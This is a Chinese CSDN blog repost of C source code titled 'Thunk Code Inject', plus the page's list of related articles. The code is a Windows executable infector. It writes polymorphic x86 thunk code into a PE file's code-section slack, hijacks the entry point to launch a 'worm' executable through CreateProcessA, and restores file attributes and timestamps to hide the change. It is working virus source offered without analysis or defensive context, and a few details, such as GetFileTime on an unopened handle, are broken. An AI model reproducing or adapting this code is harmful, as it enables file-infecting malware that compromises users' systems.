Thunk Code Inject

最新推荐文章于 2023-11-13 10:24:13 发布
最新推荐文章于 2023-11-13 10:24:13 发布
阅读量1.2k 收藏
点赞数
分类专栏: windows底层核心編程 文章标签: file null c parameters include build
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/1922953
版权
//花猫的Thunk Code Inject
#include "windows.h"

char *InfectCode = NULL;
DWORD aCreateProcess = 0;

int GetRand()
{
  return rand();
}

//disassemblied thunk code
/*
:00401000.6842104000     push   00401042                  
:00401005 33C9           xor    ecx,ecx                    
:00401007 64FF31         push   fs:dword ptr [ecx]        
:0040100A 648921         mov    fs:[ecx],esp              
:0040100D 33C0           xor    eax,eax                    
:0040100F 6A10           push   00000010                  
:00401011 59             pop    ecx                        
:00401012 50             push   eax                        
:00401013 E2FD           loop   T.00401012 (00401012)    
:00401015 6A44           push   00000044                  
:00401017 8BD4           mov    edx,esp                    
:00401019 83EC10         sub    esp,00000010              
:0040101C 8BCC           mov    ecx,esp                    
:0040101E 51             push   ecx                        
:0040101F 52             push   edx                        
:00401020 50             push   eax                        
:00401021 50             push   eax                        
:00401022 50             push   eax                        
:00401023 50             push   eax                        
:00401023 50             push   eax                        
:00401024 50             push   eax                        
:00401025 50             push   eax                        
:00401026 6854104000     push   00401054                  
:0040102B 50             push   eax                        
:0040102C B878563412     mov    eax,12345678              
:00401031 FFD0           call   eax                        
:00401033 83C454         add    esp,00000054              
:00401036 33C9           xor    ecx,ecx                    
:00401038 648F01         pop    fs:dword ptr [ecx]        
:0040103B 5E             pop    esi                        
:0040103C 6868104000     push   00401068                  
:00401041 C3             ret                              
:00401042 6868104000     push   00401068                  
:00401047 8B442410       mov    eax,[esp+10]              
:0040104B 8F80B8000000   pop    dword ptr [eax+000000B8]  
:00401051 33C0           xor    eax,eax                    
:00401053 C3             ret                              
;vfilename is here
*/

/*
Build the thunk code. This is the kernel code.
Parameters:
hostentry:original file's code entry point(RVA)
startaddr:where my thunk code start(RVA)
vname:worm file name, include full path
*/
int BuildInfectCode(const DWORD hostentry, const DWORD startaddr, const char *vname)
{
  char *p = InfectCode;
  unsigned char t, c1, c2;
  int i;

  if(0 == aCreateProcess)
      aCreateProcess = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateProcessA");
//code body
  *p++ = 0x68; //push
  *(DWORD *)p = startaddr + 0x42; //seh handler
  p += 4;
  t = GetRand() % 3; //eax, edx, ecx
  *p++ = 0x31 + ((GetRand() && 1) << 1); //xor
  *p++ = 0xc0 | (t << 3) | t; //xor reg, reg
  *p++ = 0x64; //fs
  *p++ = 0xff; //push
  *p++ = 0x30 | t;
  *p++ = 0x64; //fs
  *p++ = 0x89; //mov
  *p++ = 0x20 | t; //mov [reg], esp

  t = GetRand() % 3; //eax, edx
  if(0x01 == t) t = 0; //don't use ecx
  *p++ = 0x31 + ((GetRand() && 1) << 1); //xor
  *p++ = 0xc0 | (t << 3) | t; //xor reg, reg
  *(WORD *)p = 0x106a; //push 10h
  p += 2;
  *p++ = 0x59; //pop ecx
  *p++ = 0x50 | t; //push reg
  *(WORD *)p = 0xfde2; //loop $ - 3
  p += 2;

  *(WORD *)p = 0x446a; //push 44h
  p += 2;

  c1 = (t + 1) % 3;
  for(c2 = 0; c2 < 3; c2++)
      if(c2 != t && c2 != c1) break;
  *p++ = 0x8b; //mov
  *p++ = 0xc4 | (c1 << 3); //mov reg1, esp STARTUPINFO
  *(DWORD *)p = 0x8b10ec83; //sub esp, 10h/mov
  p += 4;
  *p++ = 0xc4 | (c2 << 3); //mov reg2, esp PROCESS_INformATION
  *p++ = 0x50 | c2; //push reg2
  *p++ = 0x50 | c1; //push reg1
  for(i = 0; i < 6; i++)
      *p++ = 0x50 | t; //push reg, reg is 0

  *p++ = 0x68; //push
  *(DWORD *)p = startaddr + 0x54; //virus file name
  p += 4;
  *p++ = 0x50 | t; //push reg, reg is 0

  t = GetRand() % 3; //eax, edx, ecx
  *p++ = 0xb8 | t; //mov
  *(DWORD *)p = aCreateProcess; //mov reg, aCreateProcess
  p += 4;
  *p++ = 0xff;
  *p++ = 0xd0 | t; //call reg
  t = GetRand() % 3; //eax, edx, ecx
  *(DWORD *)p = 0x3354c483; //add esp, 54h/xor
  p += 4;
  *p++ = 0xc0 | (t << 3) | t; //xor reg, reg
  *p++ = 0x64; //fs
  *p++ = 0x8f; //push
  *p++ = t;
  *p++ = 0x58 | (GetRand() % 3);

  *p++ = 0x68; //push
  *(DWORD *)p = hostentry; //host entry
  p += 4;
  *p++ = 0xc3; //retn

//seh handler
  *p++ = 0x68; //push
  *(DWORD *)p = hostentry; //host entry
  p += 4;
  *(DWORD *)p = 0x1024448b; //mov eax, [esp + 10h]
  p += 4;
  *(WORD *)p = 0x808f; //pop
  p += 2;
  *(DWORD *)p = 0xb8; //pop [eax + 0b8h]
  p += 4;
  *(WORD *)p = 0xc033; //xor eax,eax
  p += 2;
  *p++ = 0xc3; //retn

  i = -1;
  do {
      *p++ = vname[++i];
  }while(vname[i] != 0);

  return p - InfectCode;
}

void InfectFileHelper(char *buf, const char *vname)
{
  char *p = buf, *sec;
  DWORD entry, code, t, startaddr, base;
  int i, seccount, clen;

  if(NULL == InfectCode)
      InfectCode = new char[4096];
  try {
      if(*(WORD *)p != 0x5a4d) return;
      p = buf + *(WORD *)(p + 0x3c);
      if(*(WORD *)p != 0x4550) return;
      t = *(WORD *)(p + 0x5c);
      if(t != 0x02 && t != 0x03) return;
      entry = *(DWORD *)(p + 0x28);
      sec = p + 0x100;
      seccount = *(WORD *)(p + 6);
      for(i = 0; i < seccount; i++) {
          if(*(DWORD *)(sec + 4) <= entry
              && *(DWORD *)sec + *(DWORD *)(sec + 4) > entry)
              break;
          sec += 0x28;
      }
      if(i >= seccount - 1)
          return; //assume the code section is not the last one
      t = *(DWORD *)(sec + 0x08);
      if(*(DWORD *)sec < t) t = *(DWORD *)sec;
      startaddr = *(DWORD *)(sec + 0x04) + t;
      base = *(DWORD *)(p + 0x34);
      clen = BuildInfectCode(entry + base, startaddr + base, vname);
      code = t + *(DWORD *)(sec + 0x0c);
      if(*(DWORD *)(sec + 0x28 + 0x0c)
          <= code + clen)
          return; //no enough room
      MoveMemory(buf + code, InfectCode, clen);
      *(DWORD *)(p + 0x28) = startaddr;
  }
  catch(...) {
  }
}

void InfectFile(const char *filename, const char *vname)
{
  HANDLE fh, fm;
  DWORD fa = GetFileAttributes(filename);
  FILETIME ft[3];
  char *buf;
 
  SetFileAttributes(filename, FILE_ATTRIBUTE_NORMAL);
  GetFileTime(fh, ft, ft + 1, ft + 2);
  fh = CreateFile(filename, GENERIC_READ | GENERIC_WRITE,
      FILE_SHARE_READ, NULL, OPEN_EXISTING,
      FILE_ATTRIBUTE_NORMAL, 0);
  if(INVALID_HANDLE_value == fh) goto end;

  fm  = CreateFileMapping(fh, NULL, PAGE_READWRITE, 0, 0, NULL);
  if(fm != NULL) {
      buf = (char *)MapViewOfFile(fm, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);      
      if(buf != NULL) {
          InfectFileHelper(buf, vname);
          UnmapViewOfFile(buf);
      }
      CloseHandle(fm);
  }
  CloseHandle(fh);
end:
  SetFileAttributes(filename, fa);
  SetFileTime(fh, ft, ft + 1, ft + 2);
}

int main()
{
  srand(GetTickCount());
  InfectFile("C://example.exe", "C:/worm/me.exe");
  return 0;
}

 
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thunk示例代码
YSHE的专栏
01-16 735
了解了一下thunk,怎么感觉好像写shellcode,但觉得比较好玩,自己也写了一个示例程序,跟实际的thunk有点区别,供自己参考 #include #include #include #pragma pack(push,1) struct Thunk { BYTE m_nop; BYTE m_push; DWORD m_fun; BYTE m_push4;
THUNK
csm120224267的专栏
08-02 2224
一种实现Win32窗口过程函数(Window Procedure)的新方法   基于Thunk实现的类成员消息处理函数   JERKII.SHANG (JERKII@HOTMAIL.COM)   MAR.10th - 31st, 2006   Windows是一个
thunk技术实现窗口类的封装
01-23 560
thunk技术实现窗口类的封装时间:2008-05-25 09:16:00 来源:网络收集 作者:网络收集 点击量:1 [繁體中文 ]MFC功能已经非常强大,自己做界面库也许没什么意思,但是这个过程中却能学到很多东西。比如说:窗口类的封装,从全局窗口消息处理到窗口对象消息处理的映射方法:对界面进行封装,一般都是一个窗口一个类,比如实现一个最基本的
也谈C++中THUNK的一种实现技术
paul2002的专栏
11-25 1033
看了“我对C++中THUNK一种实现技术的分析”一文,有点不同的想法。原代码如下:#pragma pack(push,1)// structure to store the machine codestruct Thunk{    char    m_jmp;          // op code of jmp instruction    unsigned long   m_relproc; 
花指令
大宝(sodme)的专栏
02-16 5257
本文作者:sodme本文出处:http://blog.csdn.net/sodme声明:本文可以不经作者同意任意转载、复制、引用。但任何对本文的引用,均须注明本文的作者、出处以及本行声明信息。可能很多人都听说过花指令,但限于平时的开发所限,可能较少接触到。日前,跟同事讨论了一些有关花指令的问题,现将自己的体会总结一下。这篇文章将讨论以下问题:一、什么是花指令?它的原理是什么?二、在什么地方使用花指
红队系列-shellcode AV bypass Evasion免杀合集
最新发布
aming小老弟
11-13 1199
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
《WINDOWS核心编程第5版》随笔记录22
02-24 2428
条目1、使用注册表来注入DLL。(P575)原理:当User32.dll被映射到一个新的进程时,它的DLL_PROCESS_ATTACH通知会取得注册表HKEY_LOCAL_MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Windows/AppInit_DLLs中的DLL列表,逐个加载。这个DLL列表的第一个DLL文件可以包含路径,其他
Import REConstructor 1.7 FINAL
02-22
It can also inject into your output executable, a loader which is able to fill the IAT with real pointers to API or a ripped code from the protector/packer (very useful against emulated API in a thunk...
Reflective DLL Injection(字面翻译:反射dll注入)
GaA.Ra的自留地 in Csdn
06-06 8897
      这两天把印度佬的metasploit视频看完了.带着印度口音的英语伤不起啊(请自己想象生活大爆炸里Rajesh),但是这个印度佬的口音特别重,-___-,脑海里久久回荡着印度腔英语......     为什么会提到Reflective DLL Injection,看Metasploit Unleashed,里面提到神器meterpreter和vnc injection都是利用这
安装ambari的时候遇到的ambari和hadoop问题集
csdn6538954的博客
04-20 1963
5.在安装的时候遇到的问题 5.1使用ambari-server start的时候出现ERROR: Exiting with exit code -1. 5.1.1REASON: Ambari ...
一步一步简单的保护我们的源码
lixiangminghate的专栏
01-26 2273
年底了,又赶上离职潮了。离职的coder总想着带走一些代码,自己的无可厚非,别人的就不大好了。如何保护公司的重要代码成了头痛的问题。本文通过添加一些简单的手段保护重要的代码。当然,这些手段有些陈旧,对付老鸟基本无效,但一般的coder拿到这样的代码,只能按delete了。。。吗啡,在药师手上变成了麻醉药,但在瘾君子看来又是一顿饕餮,这些手段如果被离职的coder自己使用,不仅制造bug还代码保护,
PigYear病毒 代码 研究
02-08 781
PigYear病毒 代码 研究PigYear.cpp#include "stdafx.h"#include "PigYear.h"#include "MainWnd.h"//----------#ifdef _DEBUG#define new DEBUG_NEW#undef THIS_FILEstatic char THIS_FILE[] = __FILE__;#endif////////
Code Inject代码注入
每天进步一点点
08-12 4299
转3篇文章,地址是: Three Ways to Inject Your Code into Another Process http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces .NET Internals and Code In
抗去除花指令(一)(二)(三)(四)
zhangmiaoping23的专栏
08-06 4821
标 题: 【原创】抗去除花指令(一)(二)(三)(四) 作 者: yangbostar 时 间: 2011-02-18,19:24:16 链 接: http://bbs.pediy.com/showthread.php?t=129526 入门知识,高手勿读 一、概述      花指令是对抗反汇编的有效手段之一,正常代码添加了花指令之后,可以破坏静态反汇编的过程,使反汇编的结果出现错
thunk技术
dc11223344的专栏
01-18 1503
Thunk : 将一段机器码对应的字节保存在一个连续内存结构里, 然后将其指针强制转换成函数. 即用作函数来执行,通常用来将对象的成员函数作为回调函数. #include "stdafx.h" #include namespace pri{ typedef unsigned char u1byte; typedef unsigned short u2byte; typedef uns
《windows核心编程系列》十九谈谈使用远程线程来注入DLL。
系统运维
12-05 277
windows内的各个进程有各自的地址空间。它们相互独立互不干扰保证了系统的安全性。但是windows也为调试器或是其他工具设计了一些函数,这些函数可以让一个进程对另一个进程进行操作。虽然他们是为调试器设计的,但是任何应用程序都可以调用它们 。接下来我们来谈谈使用远程线程来注入DLL。 从根本上说,DLL注入就是将某一DLL注入到某一进程的地址空间。该进程中的一个线程调用LoadLibr...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9008
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3530
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 6970
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
React-thunk中间件详解:入门与实战示例
在本文中,作者深入浅出地讲解了React-thunk中间件在Redux框架中的作用和使用。React-thunk是一种在Redux应用中处理异步操作的解决方案,特别适合于那些需要在操作完成后再进行状态更新的场景。文章首先回顾了Redux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值